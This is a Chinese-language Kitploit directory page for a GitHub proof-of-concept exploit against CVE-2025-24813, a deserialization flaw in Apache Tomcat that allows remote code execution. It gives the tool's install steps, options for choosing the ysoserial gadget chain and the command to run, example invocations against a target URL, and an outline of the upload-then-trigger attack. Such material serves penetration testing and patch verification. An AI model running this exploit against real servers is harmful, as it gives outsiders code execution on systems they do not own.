Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-24813-poc — 针对CVE-2025-24813的概念验证漏洞利用,该漏洞是Apache Tomcat中的一个Java反序列化漏洞。生成恶意序列化负载并将其作为会话文件上传,以触发远程代码执行。 | Kitploit
工具/GitHubGitHub/yaleman/cve-2025-24813-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发Archived
GitHubyaleman/cve-2025-24813-poc

cve-2025-24813-poc

针对CVE-2025-24813的概念验证漏洞利用,该漏洞是Apache Tomcat中的一个Java反序列化漏洞。生成恶意序列化负载并将其作为会话文件上传,以触发远程代码执行。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24813 Apache Tomcat RCE 漏洞利用 PoC

此仓库包含针对 CVE-2025-24813(Apache Tomcat 中的一个 Java 反序列化漏洞)的概念验证利用代码。

基于 absholi7ly/POC-CVE-2025-24813/。

先决条件

  • Docker

安装

  1. 安装依赖:

    root@kitploit:~
    uv venv
    source .venv/bin/activate
    uv sync
    
  2. 下载 ysoserial:

    root@kitploit:~
    ./download.sh
    

使用方法

使用 Docker(推荐)

在容器中构建并运行漏洞利用:

root@kitploit:~
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>

直接执行

直接运行漏洞利用:

root@kitploit:~
python main.py <target_url> [options]

选项

  • --command:要执行的命令(默认:calc.exe)
  • --ysoserial:ysoserial.jar 的路径(默认:./ysoserial-all.jar)
  • --gadget:ysoserial 利用链(默认:CommonsCollections6)
  • --payload_type:载荷类型 - ysoserial 或 java(默认:ysoserial)
  • --no-ssl-verify:禁用 SSL 验证

示例

root@kitploit:~
# Basic usage
python main.py http://target:8080

# Custom command
python main.py http://target:8080 --command "whoami"

# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java

工作原理

  1. 检查目标 servlet 是否可通过 PUT 请求写入
  2. 生成恶意序列化 Java 载荷
  3. 将载荷作为会话文件上传
  4. 通过访问会话触发反序列化

免责声明

此工具仅用于教育和授权测试目的。请勿用于您不拥有或未经明确许可测试的系统。

参考

  • https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24813
  • https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md
下载工具